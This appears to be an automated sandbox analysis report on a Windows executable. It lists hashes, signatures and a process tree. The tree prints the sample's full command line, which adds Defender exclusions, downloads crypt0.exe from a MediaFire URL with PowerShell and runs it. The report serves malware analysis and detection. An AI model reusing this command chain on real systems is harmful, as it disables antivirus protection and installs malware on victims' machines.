Analysis
-
max time kernel
152s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2024, 08:42
Static task
static1
Behavioral task
behavioral1
Sample
b85059c799ed760de71b3c35021d787c.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b85059c799ed760de71b3c35021d787c.exe
Resource
win10v2004-20240226-en
General
-
Target
b85059c799ed760de71b3c35021d787c.exe
-
Size
3KB
-
MD5
b85059c799ed760de71b3c35021d787c
-
SHA1
46daac66cfd1ace98efa557cc2b739a444dd76f4
-
SHA256
2d8a407e8d61e977bd167a8505205437562c52ca60501af476d2e84180dc5132
-
SHA512
bf70487924ef752f6bdf0b43de85fa35f5bb9d9170a575efc549c1d499a1f52b0edd00f4578f7a3252f3bb011e119c52eb82d1bd22a7696180612b9fc54bfe25
Malware Config
Extracted
https://download1487.mediafire.com/y9nyrr6fzr5g/x4zfbcmgp29k79f/crypt0.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 50 3224 powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4900 powershell.exe 4900 powershell.exe 4900 powershell.exe 3224 powershell.exe 3224 powershell.exe 3224 powershell.exe 1048 powershell.exe 1048 powershell.exe 1048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4748 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeDebugPrivilege 3224 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3688 wrote to memory of 3616 3688 b85059c799ed760de71b3c35021d787c.exe 95 PID 3688 wrote to memory of 3616 3688 b85059c799ed760de71b3c35021d787c.exe 95 PID 3688 wrote to memory of 3616 3688 b85059c799ed760de71b3c35021d787c.exe 95 PID 3616 wrote to memory of 4748 3616 cmd.exe 98 PID 3616 wrote to memory of 4748 3616 cmd.exe 98 PID 3616 wrote to memory of 4748 3616 cmd.exe 98 PID 3616 wrote to memory of 4900 3616 cmd.exe 107 PID 3616 wrote to memory of 4900 3616 cmd.exe 107 PID 3616 wrote to memory of 4900 3616 cmd.exe 107 PID 3616 wrote to memory of 3224 3616 cmd.exe 110 PID 3616 wrote to memory of 3224 3616 cmd.exe 110 PID 3616 wrote to memory of 3224 3616 cmd.exe 110 PID 3616 wrote to memory of 1048 3616 cmd.exe 114 PID 3616 wrote to memory of 1048 3616 cmd.exe 114 PID 3616 wrote to memory of 1048 3616 cmd.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\b85059c799ed760de71b3c35021d787c.exe"C:\Users\Admin\AppData\Local\Temp\b85059c799ed760de71b3c35021d787c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('https://download1487.mediafire.com/y9nyrr6fzr5g/x4zfbcmgp29k79f/crypt0.exe', (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe') & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://download1487.mediafire.com/y9nyrr6fzr5g/x4zfbcmgp29k79f/crypt0.exe', (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe'))3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵PID:4264
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
19KB
MD5bc60ef9b16460d3c16888adf635e6f6f
SHA16403f4b0e6eb34d8252e53d90b52e00177063ba1
SHA256c9f921e8dbe8065369471605a9cdc83f3cc1a217605cf17e5c37ae16b5b5fc6e
SHA5121bcb067bb11291f89230da174adef86aca3378d5f5b66cbb752e69351fd0e27ae0006a21c536f5a160fe6a69f056c32c3a522f856e26a631a11505a10b6c3571
-
Filesize
18KB
MD5147f5be6faf9019237423928f0cf2e97
SHA17a64287c7b82414173a75ae684b5cf904563cc0b
SHA256319a98d6b6368e21f9e5040639f6e0861ec43a743b779ff1962e1c7fe93afc32
SHA5120f2cfe21178dc1b90e63eb051fdfd8960f6bd41cc1f4e8c5ad1ce8003c1d5284214b3e3031688cfca2fbc5acb03f1b249203c0024a771921689f5afcb7f92127
-
Filesize
18KB
MD5b3ef9b0728d9b021336e77304df9ade8
SHA160dc61953bdd01139038384413338af06386532d
SHA25682c9ea5fd8237abd4bcbcbabc0c5ce408c1af5f1a4e731ecb7892527ecb608a6
SHA5123eb516c1500970c91db578be488e20370712ba415612d7719e205df258582c0a6a1a746778d3ad61456480da6504eeca60c49fe485c7f263fb235a9d5fdb1834
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82